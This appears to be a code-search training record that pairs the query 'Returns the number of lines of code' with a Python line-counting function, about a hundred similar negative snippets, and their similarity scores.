[ "0.76896816", "0.7435254", "0.74246174", "0.73524946", "0.71989226", "0.7134408", "0.6947085", "0.69248456", "0.68103576", "0.67975587", "0.67713046", "0.67241883", "0.6704033", "0.66982996", "0.6688978", "0.66654783", "0.66048956", "0.659939", "0.6586787", "0.6566571", "0.6554063", "0.6513096", "0.6509164", "0.64822984", "0.641744", "0.6379985", "0.6377534", "0.6374552", "0.6373689", "0.6363517", "0.6350085", "0.6348819", "0.6336803", "0.6336293", "0.63165945", "0.6303672", "0.6303636", "0.62850165", "0.6282031", "0.62724113", "0.6259483", "0.6241566", "0.6219104", "0.621844", "0.62161416", "0.62108874", "0.6199137", "0.61986864", "0.61771876", "0.61711776", "0.6156518", "0.61525047", "0.6148496", "0.61477834", "0.61300063", "0.6129734", "0.6116277", "0.6108904", "0.61040914", "0.6092237", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.60846055", "0.607855", "0.60598606", "0.6054412", "0.6053824", "0.6043676", "0.60415584", "0.6039986", "0.603894", "0.60306025", "0.60221636", "0.60196185", "0.60159147", "0.60134304", "0.6012753", "0.6008091", "0.6007396", "0.6005517", "0.5996955", "0.59947175", "0.5994533", "0.5991163", "0.5988958", "0.5985996", "0.5985604", "0.5985519", "0.59737134", "0.5971817", "0.5950741", "0.59409916" ]
0.7449101
1
Returns the number of lines of code
def get_line_count(blob): return len(blob.split('\n'))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _getNewCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"-\"):\n nb_lines += 1\n return nb_lines", "def _getOldCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"+\"):\n nb_lines += 1\n return nb_lines", "def lines_of_code(project: Project) -> int:\n ret = sh.cloc(\"--quiet\", \"--include-lang=Python\", \"--yaml\", str(project.root))\n ret_obj = list(yaml.safe_load_all(str(ret)))\n return ret_obj[0][\"Python\"][\"code\"]", "def no_of_lines():\n number_of_lines = len(open(FILE_NAME).readlines())\n return number_of_lines", "def line_count(fname):\n return int(call(['wc', '-l', fname]).strip().split()[0])", "def get_linecount(self):\n self._update_linetab(len(self.input))\n lcount = len(self.__linepos)\n return lcount - (self.input.endswith('\\n'))", "def number_of_lines(filename=\"\"):\n c = 0\n with open(filename) as f:\n for r in f:\n c += 1\n return(c)", "def number_of_lines(filename=\"\"):\n num_lines = 0\n with open(filename, encoding=\"utf-8\") as myFile:\n return myFile.read().count('\\n')", "def linecount(x):\n return sum(1 for char in x if char == \"\\n\")", "def number_of_lines(filename=\"\"):\n count = 0\n with open(filename) as f:\n for lines in f:\n count += 1\n return (count)", "def linecounter(x):\n return linecount(x) + longlines(x)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 11)", "def __len__(self):\n nlines = self.get_endline() - self.get_startline() + 1\n if nlines < 0:\n nlines = 0\n return nlines", "def test_line_count(self):\n\t\tself.assertEqual(analyse_text(self.filename)[0], 4)", "def num_lines(file_name):\n with open(file_name) as file:\n for i, line in enumerate(file):\n pass\n return i + 1", "def number_of_lines(filename=\"\"):\n with open(filename, encoding='UTF8') as a_file:\n\n lineNum = 0\n\n for eachLine in a_file:\n lineNum += 1\n return lineNum", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def number_of_lines(filename=\"\"):\n with open(filename, encoding=\"utf-8\") as file:\n text = file.readlines()\n return len(text)", "def number_of_lines(filename=\"\"):\n\n number_lines = 0\n with open(filename) as file_opened:\n for line in file_opened:\n number_lines += 1\n return number_lines", "def num_lines(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return( i + 1 )", "def CountLineNumber(filename):\n\n fp = open(os.path.abspath(filename), \"r\");\n lines = 0\n for line in fp.readlines():\n lines = lines + 1\n fp.close()\n return lines", "def number_of_lines(filename=\"\"):\n counter = 0\n with open(filename, \"r\") as my_file:\n for line in my_file:\n counter += 1\n my_file.close()\n return (counter)", "def num_lines(self, snapshot: Bug, filepath: str) -> int:\n return len(self._line_offsets(snapshot, filepath))", "def n_lines(self):\n try: \n return self._n_lines\n except AttributeError:\n self._n_lines = len(self.lines())\n return self._n_lines", "def number_of_lines(filename=\"\"):\n n_lines = 0\n with open(filename, encoding='utf-8', mode='r') as file:\n for lines in file:\n n_lines += 1\n return n_lines", "def number_of_lines(filename=\"\"):\n line_number = 0\n with open(filename, encoding='UTF8') as f:\n for line in f:\n line_number += 1\n return line_number", "def lineNumber(self):\n if self.__lineNumber is None:\n self.__lineNumber = self.__source.count(\"\\n\", 0, 
self.__offset) + 1\n\n return self.__lineNumber", "def count_lines(filename):\r\n with open(filename, 'rb') as f:\r\n return sum(1 for line in f)", "def calculate_line_number(text):\n return len([line for line in text.split(\"\\n\") if line.strip() != \"\"])", "def number_of_lines(filename=\"\"):\n n = 0\n if filename == \"\":\n return n\n with open(filename, \"r\") as f:\n for line in f:\n n = n + 1\n return n", "def count_lines(file_uri):\n\n with open(file_uri) as file_obj:\n for i, line in enumerate(file_obj):\n pass\n num_lines = i + 1\n return num_lines", "def count_lines(filename):\n with open(filename, 'rb') as f:\n return sum(1 for line in f)", "def fileLineCount(fPath):\n\twith open(fPath) as f:\n\t\tfor i, li in enumerate(f):\n\t\t\tpass\n\treturn (i + 1)", "def numLinesInFile(fname):\n with open(fname, 'rb') as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def line_count(file):\n with open(file, \"r\") as f:\n return sum(1 for line in f)", "def countLines(file_name, start, end):\r\n\r\n with open(file_name, \"r\") as file:\r\n counter_lines = 0\r\n\r\n for line in islice(file, start, end):\r\n counter_lines += 1\r\n\r\n return counter_lines", "def number_of_lines(filename=\"\"):\n with open(filename, encoding='utf-8') as myFile:\n return sum([1 for line in myFile])", "def analyzeCppCode(self, sourceFile):\n numLines = 0 # Number of lines of code\n numComments = 0 # Number of comments in the code\n\n f=self.openFile(sourceFile)\n for line in f:\n numLines += 1;\n loc = 0\n while (loc != -1): #count the # of times the '/*' characters appears\n loc = line.find(\"#\", loc)\n if (loc != -1):\n loc += 1\n numComments += 1\n \n loc = 0\n loc = line.find('//', loc) #count the # of times the '//' characters appears\n if (loc != -1):\n loc += 1\n numComments += 1\n \n f.close()\n return numLines, numComments", "def count_lines(stream):\n return len(stream.readlines())", "def file_len(full_path):\n f = open(full_path)\n nr_of_lines = sum(1 for line in f)\n f.close()\n return nr_of_lines", "def countlines(fn):\n with open(fn, 'rb') as f:\n bufgen = takewhile(\n lambda x: x, (f.read(1024 * 1024) for _ in repeat(None)))\n ln = sum(buf.count(b'\\n') for buf in bufgen)\n return ln", "def line_length(self, dLine = 0):\n return self.buffer.line_length(self.line + dLine)", "def len(self):\n\t\t\n\t\treturn len(self.line)", "def GetNumberCodeBlocks(separators):\n num_blocks = len(separators) + 1\n assert num_blocks >= 2\n return num_blocks", "def get_line_no(obj):\n try:\n lineno = getsourcelines(obj)[1]\n except:\n # no code found\n lineno = None\n return lineno", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def get_file_line_count(a_file):\r\n count = -1\r\n try:\r\n for count, line in enumerate(open(a_file, \"rU\")):\r\n pass\r\n except IOError:\r\n pass\r\n count += 1\r\n return count", "def get_file_line_count(a_file):\r\n count = -1\r\n try:\r\n for count, line in enumerate(open(a_file, \"rU\")):\r\n pass\r\n except IOError:\r\n pass\r\n count += 1\r\n return count", "def sentence_count(self):\n count = 0\n for line in self.lines:\n if '.' 
in line:\n count += 1\n if count == 0:\n count = 1\n return count\n #return line.count('.')\n #else:\n #return 1", "def count_lines_of_code(repo_path):\n\n cmd = \"cloc\"\n out = subprocess.Popen(\n f\"{cmd} {repo_path}\",\n shell=True,\n stdout=subprocess.PIPE,\n universal_newlines=True,\n ).stdout.read()\n\n str = StringIO(out)\n for line in str:\n if line.startswith(\"--------\"):\n break\n data = pd.read_csv(\n str,\n skiprows=0,\n skipfooter=3,\n skip_blank_lines=True,\n sep=r\"[ ]{5,}\",\n index_col=\"Language\",\n comment=\"-\",\n engine=\"python\",\n )\n\n return data", "def no_of_lines():\n return render_template(\"no_of_lines.html\", no_of_lines=no_of_lines())", "def getIndentationLevel(self, code_line):\n print(\"the code line : \", code_line)\n return len(code_line) - len(code_line.lstrip(\" \"))", "def num_lines_in_file(file_name):\n line_idx = -1\n with open(file_name) as file:\n for line_idx, _ in enumerate(file):\n pass\n return line_idx + 1", "def _get_last_code_line():\n return max(_code_lines) + 2", "def peek_length(self) -> Optional[int]:\n LINE_CUTOFF = 10_000\n count = 0\n with open(self.path, mode='r') as f:\n for _ in f:\n count += 1\n\n return count", "def _loc(self) -> int:\n return len(self.lines)", "def file_number_of_lines(file_name):\n try:\n item = (0, None)\n with open(file_name) as file_handler:\n for item in enumerate(file_handler):\n pass\n return item[0] + 1\n except IOError:\n return 0", "def bufcount(filename):\n\timport gzip\n\tif filename.split('.')[-1] in ['gz','gzip']: f = gzip.open(filename)\n\telse: f = open(filename)\n\tlines = 0\n\tbuf_size = 1024 * 1024\n\tread_f = f.read # loop optimization\n\t\n\tbuf = read_f(buf_size)\n\twhile buf:\n\t\tlines += buf.count('\\n')\n\t\tbuf = read_f(buf_size)\n\t\tf.close\n\treturn lines", "def lines_processed(self) -> int:\n with self.lock:\n return self._lines_processed", "def get_n_lines(file):\n return sum(1 for _ in open(file))", "def get_line_length(file_path):\n with open(file_path, 'rb+') as f:\n return len(f.readline())", "def test_makefile_total_lines(cookies, context, black, pipenv, mypy):\n ctx = context(black=black, pipenv=pipenv, mypy=mypy)\n result = cookies.bake(extra_context=ctx)\n\n makefile = result.project.join('Makefile')\n lines = makefile.readlines(cr=False)\n\n expected = 27\n expected -= 2 if black == 'n' else 0\n expected -= 1 if mypy == 'do not use' else 0\n assert len(lines) == expected", "def lineno():\n return str(' - Statement - line number: '+str(inspect.currentframe().f_back.f_lineno))", "def file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n Nrows = i + 1\n return Nrows", "def count_len(self):\n total = 0\n for filename in self.filenames:\n f = open(os.path.join(self.directory, filename))\n line_count = 0\n for _ in f:\n line_count += 1\n if line_count < self.window_size:\n continue\n else:\n total += line_count - self.window_size + 1\n return total", "def line(self) -> int:", "def linenum(self):\n return self.source_frame_stack.linenum()", "def error_count():\n return cpp_style.error_count()", "def count() -> int:\n pass", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n 
raise NameError(\"No files to count lines\")", "def count_lines(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n lines_count = int()\n for line in file:\n lines_count += 1\n info_tuple = (filename, lines_count)\n return info_tuple", "def lineno():\n\treturn inspect.currentframe().f_back.f_lineno", "def lineno():\r\n\treturn inspect.currentframe().f_back.f_lineno", "def lineno():\n\n return inspect.currentframe().f_back.f_lineno", "def count_lines(file_obj):\n for idx, line in enumerate(file_obj):\n pass\n file_obj.seek(0)\n return idx + 1", "def _count_comment_rows(vcf_path):\n vcf_lines_generator = lines_from_vcf(vcf_path)\n\n comment_lines_count = 0\n for line in vcf_lines_generator:\n if line.startswith('#'):\n comment_lines_count += 1\n else:\n vcf_lines_generator.close() # Don't leave the file handle opened\n # Don't continue reading the VCF once the comments section ended\n break\n\n return comment_lines_count", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return \"line \" + str(inspect.currentframe().f_back.f_lineno) + \": \"", "def get_total_line_counts(self):\n return get_total_line_counts(self.files.all())", "def _get_line_number(vcf):\n with open(vcf) as vcf_input_file:\n i = -1\n for line in vcf_input_file:\n i += 1\n return i", "def getNumRows(self) -> int:\n ...", "def num_bytes_per_line(self):\n return self._num_bytes_per_line", "def get_filesize(inputfile) -> int:\n with open(inputfile, \"rb\") as f:\n lines = 0\n buf_size = 1024 * 1024\n read_f = f.raw.read\n\n buf = read_f(buf_size)\n while buf:\n lines += buf.count(b\"\\n\")\n buf = read_f(buf_size)\n\n return lines", "def main():\n\tcount = 0\n\twith open(FILE, 'r') as f:\n\t\tfor line in f:\n\t\t\tcount += 1\n\tprint('There are ' + str(count) + ' lines in '+str(FILE))", "def count_total_line():\n count = 0\n file_count = 0\n for filename in os.listdir('.'):\n if filename.endswith(\".json\"):\n file_count += 1\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n count += 1\n print(\"There are {0} lines in {1} json files\".format(count, file_count))", "def do_len(self, line):\n\t\tif isinstance(self.cl, Book):\n\t\t\tprint(len(self.cl.data))\n\t\telse:\n\t\t\tprint(\"To get number of contacts you need to open or create book\")", "def data_len(self):\n Nrows_data = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] != self.header_char) and (l != \"\\n\"):\n Nrows_data += 1\n return Nrows_data", "def file_len(filename):\n with open(filename) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def get_lineno(self):\n return self.lexer.get_lineno()", "def word_count(self):\n print(self.words())\n return len(self.words())\n #count = 0\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # count += len(wordslst)\n #return count\n #joined_string = ''.join(self.lines)\n #for word in joined_string:\n # if word != ' ' and word != '\\n' and word != '\\t':\n # count += 1\n #print('READ ME ––––––––––', self.lines)\n #print(joined_string)\n #print(line)\n #print(wordslst)\n #print(count)", "def len(self, table):\n 
return self.get_table_nb_lines(table)", "def __len__(self):\n return len(self._statements)", "def file_length(fileName):\n with open(f_pass) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def analyzePythonCode(self, sourceFile):\n numLines = 0 # Number of lines of code\n numDocStr = 0 # Number of doc strings in code\n numComments = 0 # Number of comments in the code\n numDefs = 0 # Number of functions\n numClasses = 0 # Number of classes\n f=self.openFile(sourceFile)\n for line in f:\n numLines += 1;\n loc = 0\n while (loc != -1): #count the # of times the '#' characters appears\n loc = line.find(\"#\", loc)\n if (loc != -1):\n loc += 1\n numComments += 1\n loc = 0\n while (loc != -1):\n loc = line.find('\"#', loc) #discount the # of times the '#' char appears as the 1st char in double quotes (skip hex constants)\n if (loc != -1):\n loc += 1\n numComments -= 1\n loc = 0\n while (loc != -1):\n loc = line.find(\"'#\", loc) #discount the # of times the '#' char appears as the 1st char in single quotes (skip hex constants)\n if (loc != -1):\n loc += 1\n numComments -= 1\n loc = 0\n while (loc != -1): #count the # of ''' found\n loc = line.find(\"'''\", loc)\n if (loc != -1):\n loc += 1\n numDocStr += 1\n loc = 0\n while (loc != -1): #count the # of \"\"\" found\n loc = line.find('\"\"\"', loc)\n if (loc != -1):\n loc += 1\n numDocStr += 1\n\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES) != '':\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES).split()[0] == 'def': #count # of defs\n numDefs += 1\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES).split()[0] == 'class': #count # of classes\n numClasses += 1\n \n f.close()\n numDocStr /= 2 #assume that the \"\"\" and ''' chars appear in pairs \n return numLines, numDocStr, numComments, numDefs, numClasses" ]
[ "0.7965521", "0.7897408", "0.75982934", "0.7581331", "0.74807435", "0.7371733", "0.7250094", "0.7241558", "0.72400385", "0.72222334", "0.7206555", "0.7148526", "0.71233124", "0.709178", "0.7083922", "0.70714384", "0.70620733", "0.70620733", "0.7023198", "0.7015476", "0.70146966", "0.7013005", "0.69860053", "0.69675", "0.69659233", "0.69621384", "0.6935532", "0.6933272", "0.68894506", "0.686778", "0.6863906", "0.68272054", "0.6805853", "0.6794228", "0.6793833", "0.67871153", "0.6747637", "0.6744471", "0.66843086", "0.66719246", "0.66585904", "0.66365945", "0.66013324", "0.65991664", "0.65793055", "0.65612924", "0.65388846", "0.6534188", "0.6534188", "0.6533681", "0.6488951", "0.6456435", "0.6432857", "0.64278686", "0.64251244", "0.6413215", "0.64098006", "0.6391175", "0.635318", "0.6349418", "0.6334869", "0.62895167", "0.6233148", "0.6216152", "0.6213807", "0.6213631", "0.6211288", "0.61742073", "0.6164545", "0.6163333", "0.61625844", "0.6160504", "0.6151104", "0.61435676", "0.6131023", "0.61304003", "0.61228085", "0.61099863", "0.61099863", "0.61099863", "0.61099863", "0.61099863", "0.61099863", "0.6105835", "0.60660774", "0.60472804", "0.60425735", "0.60361856", "0.60305876", "0.6016017", "0.60140264", "0.60129535", "0.5988537", "0.5979695", "0.5968303", "0.5924602", "0.5920255", "0.5915909", "0.59001666", "0.58822376" ]
0.68328536
31
Removes docstrings from code
def strip_docstring(blob): docstring = True while docstring == True: match_docstring = re.search('\n\s*"""[^"""]*"""', blob) if not match_docstring: docstring = False else: blob = blob.replace(blob[match_docstring.span()[0]:match_docstring.span()[1]], '') return blob
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def docstring_hack():\n pass", "def main_docstring():", "def undoc(func):\n return func", "def remove_comments_and_docstrings(source):\n io_obj = StringIO(source)\n out = \"\"\n prev_toktype = tokenize.INDENT\n last_lineno = -1\n last_col = 0\n for tok in tokenize.generate_tokens(io_obj.readline):\n token_type = tok[0]\n token_string = tok[1]\n start_line, start_col = tok[2]\n end_line, end_col = tok[3]\n ltext = tok[4]\n # The following two conditionals preserve indentation.\n # This is necessary because we're not using tokenize.untokenize()\n # (because it spits out code with copious amounts of oddly-placed\n # whitespace).\n if start_line > last_lineno:\n last_col = 0\n if start_col > last_col:\n out += (\" \" * (start_col - last_col))\n # Remove comments:\n if token_type == tokenize.COMMENT:\n pass\n # This series of conditionals removes docstrings:\n elif token_type == tokenize.STRING:\n if prev_toktype != tokenize.INDENT:\n # This is likely a docstring; double-check we're not inside an operator:\n if prev_toktype != tokenize.NEWLINE:\n # Note regarding NEWLINE vs NL: The tokenize module\n # differentiates between newlines that start a new statement\n # and newlines inside of operators such as parens, brackes,\n # and curly braces. Newlines inside of operators are\n # NEWLINE and newlines that start new code are NL.\n # Catch whole-module docstrings:\n if start_col > 0:\n # Unlabelled indentation means we're inside an operator\n out += token_string\n # Note regarding the INDENT token: The tokenize module does\n # not label indentation inside of an operator (parens,\n # brackets, and curly braces) as actual indentation.\n # For example:\n # def foo():\n # \"The spaces before this docstring are tokenize.INDENT\"\n # test = [\n # \"The spaces before this string do not get a token\"\n # ]\n\n else:\n out += token_string\n prev_toktype = token_type\n last_col = end_col\n last_lineno = end_line\n out = '\\n'.join([line for line in out.splitlines() if line.strip()])\n return out", "def clean_docstring(doc: str, unused: Literal[\"pre\", \"post\"] = None) -> str:\n doc = doc.split(\"\\n\")\n if unused == \"pre\":\n try:\n index = next(i for i, l in enumerate(doc) if l.strip())\n doc = doc[index:]\n except StopIteration:\n doc = []\n elif unused == \"post\":\n try:\n index = next(i for i, l in enumerate(reversed(doc)) if l.strip())\n doc = doc[: len(doc) - index]\n except StopIteration:\n doc = []\n if doc:\n first_line = doc[0]\n index = len(first_line) - len(first_line.lstrip())\n indent = first_line[:index]\n if all(l.startswith(indent) for l in doc if l.strip()):\n doc = [(l[index:] if l.strip() else l) for l in doc]\n return \"\\n\".join(doc)", "def doc_string():\n pass # pass does nothing", "def DocString():\n return", "def empty_fn_docstr_pass():\n pass", "def documentation_only():\n pass", "def empty_fn_docstr():", "def sanitizeForHTML (docstring):\n\n # Remove @~, which we use as a hack in Doxygen 1.7-1.8\n\n docstring = docstring.replace(r'@~', '')\n\n # First do conditional section inclusion based on the current language.\n # Our possible conditional elements and their meanings are:\n #\n # java: only Java\n # python: only Python\n # perl: only Perl\n # cpp: only C++\n # csharp: only C#\n # conly: only C\n # clike: C, C++\n # notcpp:\tnot C++\n # notclike: not C or C++\n #\n # The notcpp/notclike variants are because Doxygen 1.6.x doesn't have\n # @ifnot, yet sometimes we want to say \"if not C or C++\".\n\n cases = 'java|python|perl|cpp|csharp|conly|clike|notcpp|notclike'\n p = 
re.compile('@if\\s+(' + cases + ')\\s+(.+?)((@else)\\s+(.+?))?@endif', re.DOTALL)\n docstring = p.sub(translateIfElse, docstring)\n\n # Replace blank lines between paragraphs with <p>. There are two main\n # cases: comments blocks whose lines always begin with an asterix (e.g.,\n # C/C++), and comment blocks where they don't (e.g., Python). The third\n # substitution below does the same thing for blank lines, except for the\n # very end of the doc string.\n\n p = re.compile('^(\\s+)\\*\\s*$', re.MULTILINE)\n docstring = p.sub(r'\\1* <p>', docstring)\n p = re.compile('^((?!\\s+\\Z)\\s+)$', re.MULTILINE)\n docstring = p.sub(r'\\1<p>', docstring)\n p = re.compile('^(?!\\Z)$', re.MULTILINE)\n docstring = p.sub(r'<p>', docstring)\n\n # Javadoc doesn't have an @htmlinclude command, so we process the file\n # inclusion directly here.\n\n p = re.compile('@htmlinclude\\s+([^\\s:;,(){}+|?\"\\'/]+)([\\s:;,(){}+|?\"\\'/])', re.MULTILINE)\n docstring = p.sub(translateInclude, docstring)\n\n # There's no Javadoc verbatim or @code/@endcode equivalent, so we have to\n # convert it to raw HTML and transform the content too. This requires\n # helpers. The following treats both @verbatim and @code the same way.\n\n p = re.compile('@verbatim.+?@endverbatim', re.DOTALL)\n docstring = p.sub(translateVerbatim, docstring)\n p = re.compile('@code.+?@endcode', re.DOTALL)\n docstring = p.sub(translateVerbatim, docstring)\n\n # Javadoc doesn't have a @section or @subsection commands, so we translate\n # those ourselves.\n\n p = re.compile('@section\\s+[^\\s]+\\s+(.*)$', re.MULTILINE)\n docstring = p.sub(r'<h2>\\1</h2>', docstring)\n p = re.compile('@subsection\\s+[^\\s]+\\s+(.*)$', re.MULTILINE)\n docstring = p.sub(r'<h3>\\1</h3>', docstring)\n p = re.compile('@subsubsection\\s+[^\\s]+\\s+(.*)$', re.MULTILINE)\n docstring = p.sub(r'<h4>\\1</h4>', docstring)\n\n # Javadoc doesn't have an @image command. We translate @image html\n # but ditch @image latex.\n\n p = re.compile('@image\\s+html+\\s+([^\\s]+).*$', re.MULTILINE)\n docstring = p.sub(r\"<center><img src='\\1'></center><br>\", docstring)\n p = re.compile('@image\\s+latex+\\s+([^\\s]+).*$', re.MULTILINE)\n docstring = p.sub(r'', docstring)\n\n # Doxygen doesn't understand HTML character codes like &ge;, so we've\n # been using doxygen's Latex facility to get special mathematical\n # characters into the documentation, but as luck would have it, Javadoc\n # doesn't understand the Latex markup. 
All of this is getting old.\n\n docstring = re.sub(r'\\\\f\\$\\\\geq\\\\f\\$', '&#8805;', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\leq\\\\f\\$', '&#8804;', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\times\\\\f\\$', '&#215;', docstring)\n\n # The following are done in pairs because I couldn't come up with a\n # better way to catch the case where @c and @em end up alone at the end\n # of a line and the thing to be formatted starts on the next one after\n # the comment '*' character on the beginning of the line.\n\n docstring = re.sub('@c *([^ ,;()/*\\n\\t]+)', r'<code>\\1</code>', docstring)\n docstring = re.sub('@c(\\n[ \\t]*\\*[ \\t]*)([^ ,;()/*\\n\\t]+)', r'\\1<code>\\2</code>', docstring)\n docstring = re.sub('@p +([^ ,.:;()/*\\n\\t]+)', r'<code>\\1</code>', docstring)\n docstring = re.sub('@p(\\n[ \\t]*\\*[ \\t]+)([^ ,.:;()/*\\n\\t]+)', r'\\1<code>\\2</code>', docstring)\n docstring = re.sub('@em *([^ ,.:;()/*\\n\\t]+)', r'<em>\\1</em>', docstring)\n docstring = re.sub('@em(\\n[ \\t]*\\*[ \\t]*)([^ ,.:;()/*\\n\\t]+)', r'\\1<em>\\2</em>', docstring)\n\n # Convert @li into <li>, but also add <ul> ... </ul>. This is a bit\n # simple-minded (I suppose like most of this code), but ought to work\n # for the cases we use in practice.\n\n p = re.compile('^(\\s+\\*\\s+)(@li\\s+.*?)(\\s+)(\\*/|\\*\\s+@(?!li\\s)|\\*\\s+<p>)', re.MULTILINE|re.DOTALL)\n docstring = p.sub(rewriteList, docstring)\n\n # Wrap @deprecated content with a class so that we can style it.\n\n p = re.compile('^(\\s+\\*\\s+)(@deprecated\\s)((\\S|\\s)+)(<p>|\\*/)', re.MULTILINE|re.DOTALL)\n docstring = p.sub(rewriteDeprecated, docstring)\n\n # Doxygen automatically cross-references class names in text to the class\n # definition page, but Javadoc does not. Rather than having to put in a\n # lot conditional @if/@endif's into the documentation to manually create\n # cross-links just for the Java case, let's automate. This needs to be\n # done better (e.g., by not hard-wiring the class names).\n\n p = re.compile(r'([^a-zA-Z0-9_.\">])(' + r')\\b([^:])', re.DOTALL)\n if language == 'csharp':\n docstring = p.sub(translateClassRefCSharp, docstring)\n elif language == 'java':\n docstring = p.sub(translateClassRefJava, docstring)\n\n # Massage method cross-references.\n\n p = re.compile('(\\s+)(\\S+?)::(\\w+\\s*\\([^)]*?\\))', re.MULTILINE)\n if language == 'csharp':\n docstring = p.sub(translateCSharpCrossRef, docstring)\n elif language == 'java':\n docstring = p.sub(translateJavaCrossRef, docstring)\n\n # Clean-up step needed because some of the procedures above are imperfect.\n # This converts \" * * @foo\" lines into \" * @foo\":\n\n p = re.compile('^(\\s+)\\*\\s+\\*\\s+@', re.MULTILINE)\n docstring = p.sub(r'\\1* @', docstring)\n\n # Take out any left-over Doxygen-style quotes, because Javadoc doesn't have\n # the %foo quoting mechanism.\n\n docstring = re.sub('(\\s)%(\\w)', r'\\1\\2', docstring)\n\n # Currently, we don't handle @ingroup.\n\n docstring = re.sub('@ingroup \\w+', '', docstring)\n\n return docstring", "def dummy(doc):\r\n return doc", "def test_missing_docstring(a, b): # noqa: D213, D407", "def rewriteDocstringForPerl (docstring):\n\n # Get rid of the /** ... 
*/ and leading *'s.\n docstring = docstring.replace('/**', '').replace('*/', '').replace('*', ' ')\n\n # Get rid of indentation\n p = re.compile('^\\s+(\\S*\\s*)', re.MULTILINE)\n docstring = p.sub(r'\\1', docstring)\n\n # Get rid of paragraph indentation not caught by the code above.\n p = re.compile('^[ \\t]+(\\S)', re.MULTILINE)\n docstring = p.sub(r'\\1', docstring)\n\n # Get rid of blank lines.\n p = re.compile('^[ \\t]+$', re.MULTILINE)\n docstring = p.sub(r'', docstring)\n\n # Get rid of the %foo quoting.\n docstring = re.sub('(\\s)%(\\w)', r'\\1\\2', docstring)\n\n # The following are done in pairs because I couldn't come up with a\n # better way to catch the case where @c and @em end up alone at the end\n # of a line and the thing to be formatted starts on the next one after\n # the comment '*' character on the beginning of the line.\n\n docstring = re.sub('@c *([^ ,.:;()/*\\n\\t]+)', r'C<\\1>', docstring)\n docstring = re.sub('@c(\\n[ \\t]*\\*[ \\t]*)([^ ,.:;()/*\\n\\t]+)', r'\\1C<\\2>', docstring)\n docstring = re.sub('@p +([^ ,.:;()/*\\n\\t]+)', r'C<\\1>', docstring)\n docstring = re.sub('@p(\\n[ \\t]*\\*[ \\t]+)([^ ,.:;()/*\\n\\t]+)', r'\\1C<\\2>', docstring)\n docstring = re.sub('@em *([^ ,.:;()/*\\n\\t]+)', r'I<\\1>', docstring)\n docstring = re.sub('@em(\\n[ \\t]*\\*[ \\t]*)([^ ,.:;()/*\\n\\t]+)', r'\\1I<\\2>', docstring)\n\n docstring = docstring.replace('<ul>', '\\n=over\\n')\n docstring = docstring.replace('<li> ', '\\n=item\\n\\n')\n docstring = docstring.replace('</ul>', '\\n=back\\n')\n\n docstring = docstring.replace('@return', 'Returns')\n docstring = docstring.replace(' < ', ' E<lt> ').replace(' > ', ' E<gt> ')\n docstring = re.sub('<code>([^<]*)</code>', r'C<\\1>', docstring)\n docstring = re.sub('<b>([^<]*)</b>', r'B<\\1>', docstring) \n\n return docstring", "def docstrings(param1, param2):\n return \"example string\"", "def load_pydoc(finder, module):\n module.IgnoreName(\"Tkinter\")", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def clean_doc(doc):\r\n # Replace regular enter (i.e. mere comment formatting in cpp file)\r\n # with space\r\n doc = doc.replace(\"\\n\", \" \")\r\n\r\n # The removal can cause a \"hard enter\" (literal \\n) to get an unintended\r\n # trailing space - trim those.\r\n doc = doc.replace(\"\\\\n \", \"\\\\n\")\r\n return '\"%s\"' % doc", "def rewriteDocstringForCSharp (docstring):\n\n # Preliminary: rewrite some of the data type references to equivalent\n # C# types. 
